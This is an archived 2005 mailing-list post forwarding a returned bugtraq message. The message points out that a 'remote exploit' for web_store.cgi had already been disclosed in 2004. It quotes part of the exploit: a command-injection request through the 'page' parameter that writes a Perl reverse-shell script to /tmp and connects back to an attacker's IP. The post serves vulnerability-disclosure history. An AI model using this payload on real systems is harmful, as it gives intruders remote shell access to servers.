[VIM] Returned post for bugtraq@securityfocus.com (web_store.cgi)

security curmudgeon jericho at attrition.org
Mon Jun 27 05:09:27 EDT 2005



---------- Forwarded message ----------
From: bugtraq-help at securityfocus.com
To: jericho at attrition.org
Date: 27 Jun 2005 01:12:05 -0000
Subject: Returned post for bugtraq at securityfocus.com

Hi! This is the ezmlm program. I'm managing the
bugtraq at securityfocus.com mailing list.

I'm working for my owner, who can be reached
at bugtraq-owner at securityfocus.com.

I'm sorry, the list moderators for the bugtraq list
have failed to act on your post. Thus, I'm returning it to you.
If you feel that this is in error, please repost the message
or contact a list moderator directly.

--- Enclosed, please find the message you sent.



From: security curmudgeon <jericho at attrition.org>
To: bugtraq at securityfocus.com
Date: Wed, 22 Jun 2005 04:47:00 -0400 (EDT)
Subject: Re: Remote Exploit for  Web_store.cgi



On Mon, 13 Jun 2005 ActionSpider at securityfocus.com wrote:

: #!/usr/bin/perl -w
: #
: #********************************************************************************************
: #               Remote Command Execution Vulnerability In Web_store.cgi *

: $string="/$path/web_store.cgi?page=.html|cd /tmp;echo ".q{use
: Socket;$execute= 'echo "`uname -a`";echo
: "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target)
: || die("Error: $!\n");$paddr=sockaddr_in($port,
: $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET,
: PF_INET, SOCK_STREAM, $proto) || die("Error:
: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN,
: ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR,
: ">&SOCKET");system($execute);close(STDIN)}." >>dc.pl;perl dc.pl $ip
: $reverse|";

This was disclosed on 2004-07-17 by Zero_X www.lobnan.de Team
(zero-x at linuxmail.org).

http://archives.neohapsis.com/archives/bugtraq/2004-07/0197.html

